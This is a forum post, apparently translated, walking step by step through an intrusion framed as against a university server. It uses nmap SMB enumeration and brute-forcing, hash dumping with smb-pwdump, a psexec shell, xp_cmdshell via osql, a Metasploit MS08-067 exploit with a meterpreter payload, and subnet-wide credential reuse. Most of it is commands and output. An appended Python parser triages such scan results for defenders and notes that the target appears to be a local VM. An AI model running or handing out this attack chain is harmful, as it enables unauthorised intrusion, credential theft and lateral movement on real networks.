nmap + msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// look at the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // in msf, exploit the ms08-067 vulnerability against the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try to log in across the whole internal subnet using the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack~~
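As an added defender-side example (not from the original post), the following Python triages the host-script section of nmap output like the results above, flagging anonymous share access, successful credential guesses, LM hashes that reveal empty or short passwords, and an unpatched MS08-067; the sample input is constructed from the post's results, and the function and category names are my own.

```python
import re
# Constructed sample in nmap normal-output form, modelled on the post's results (not captured output).
SAMPLE = """\
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""
# DES block an LM hash carries for an empty 7-byte half: a second half equal to it means <= 7 chars.
EMPTY_LM_HALF = "AAD3B435B51404EE"
def parse_scripts(text):
    # Group nmap "| script-name:" blocks into {script_name: [body lines minus the "| " gutter]}.
    scripts, current = {}, None
    for raw in text.splitlines():
        head = re.match(r"^\|_?\s+(\S+):\s*$", raw)
        if head:
            current = head.group(1)
            scripts[current] = []
        elif current and raw.startswith("|"):
            scripts[current].append(raw.lstrip("|_ ").rstrip())
    return scripts

def triage(text):
    # Return (category, subject, detail) tuples for the findings a defender must act on.
    findings, share = [], None
    for script, lines in parse_scripts(text).items():
        for ln in lines:
            if script == "smb-enum-shares":
                if " " not in ln:
                    share = ln  # a bare share name such as IPC$
                elif ln.startswith("Anonymous access:") and "<none>" not in ln:
                    findings.append(("anonymous-share", share, ln.split(":", 1)[1].strip()))
            elif script == "smb-brute" and "Login was successful" in ln:
                user, _, pw = ln.split(" => ", 1)[0].partition(":")
                findings.append(("blank-password" if pw == "<blank>" else "guessed-password", user, pw))
            elif script == "smb-pwdump" and " => " in ln:
                user_rid, _, hashes = ln.partition(" => ")
                user, _, rid = user_rid.partition(":")
                lm = hashes.partition(":")[0]  # LM half first, NT hash second
                cat = ("empty-password" if lm.startswith("NO PASSWORD")
                       else "short-lm-password" if lm[16:].upper() == EMPTY_LM_HALF
                       else "lm-hash-present")  # LM hashing is enabled at all
                findings.append((cat, user, "rid " + rid))
            elif script == "smb-check-vulns" and "VULNERABLE" in ln:
                findings.append(("unpatched", ln.split(":", 1)[0], "VULNERABLE"))
    return findings
```

Feed it the normal (-oN) output of a scan of your own hosts. Note that 08:00:27 (Cadmus Computer Systems) is the VirtualBox OUI and the same MAC answers later from 192.168.1.105, so the host scanned in this post is a local VM.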